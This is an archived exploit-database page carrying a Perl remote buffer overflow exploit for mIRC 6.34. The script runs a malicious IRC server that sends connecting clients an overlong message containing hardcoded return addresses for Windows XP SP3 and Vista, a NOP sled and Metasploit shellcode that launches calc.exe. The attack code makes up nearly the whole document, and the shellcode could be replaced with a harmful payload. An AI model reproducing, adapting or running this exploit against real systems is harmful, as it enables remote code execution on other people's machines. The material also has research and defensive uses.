exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mirc634-overflow.txt

mirc634-overflow.txt
Posted Oct 6, 2008
Authored by SkD

MIRC version 6.34 remote buffer overflow exploit that spawns calc.exe.

tags | exploit, remote, overflow
SHA-256 | 7395c86dff59c0fbcb031226149a38324b2c0c6eba091636a7a3542528089724

mirc634-overflow.txt

Change Mirror Download
#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------



use IO::Socket;

if(!($ARGV[1]))
{
print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0>\n[x] Example: mirc_exp.pl 6667 0\n\n";
exit;
}


while(1)
{

my $sock=new IO::Socket::INET (
Listen => 1,

LocalAddr => '127.0.0.1',

LocalPort => $ARGV[0],

Proto => 'tcp');

die unless $sock;

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
"\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4".
"\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8".
"\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc".
"\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97".
"\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5".
"\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a".
"\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99".
"\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5".
"\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1";

print "[x] Listening on port ".$ARGV[0]."..\r\n";
$s=$sock->accept();
print "[x] Got a user!\r\n";
$overflow = "\x41" x 307;
$overflow2 = "B" x 12;
$eip_vista = "\x66\x1c\xc2\x76"; #Normaliz.DLL pop pop ret
$eip2_vista = "\xd3\xdb\x54\x77"; #MSFCT.DLL jmp esp
$eip_xpsp3 = "\xd1\xfb\x92\x77"; #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
$eip2_xpsp3 = "\xb7\x87\x9d\x77"; #SETUPAPI.DLL 0x779D87B7 jmp esp
$addr = "\xb5\xb5\xfd\x7f";
$nop_sled = "\x90" x 4;
$jmp = "\xEB\x03\xFF\xFF";

print "[x] Sending packets..\r\n";

print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow\r\n";
sleep(1);
if($ARGV[1] == "1"){
print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n";
}else{
print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n";
}
print "[x] Check it out!\r\n";
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close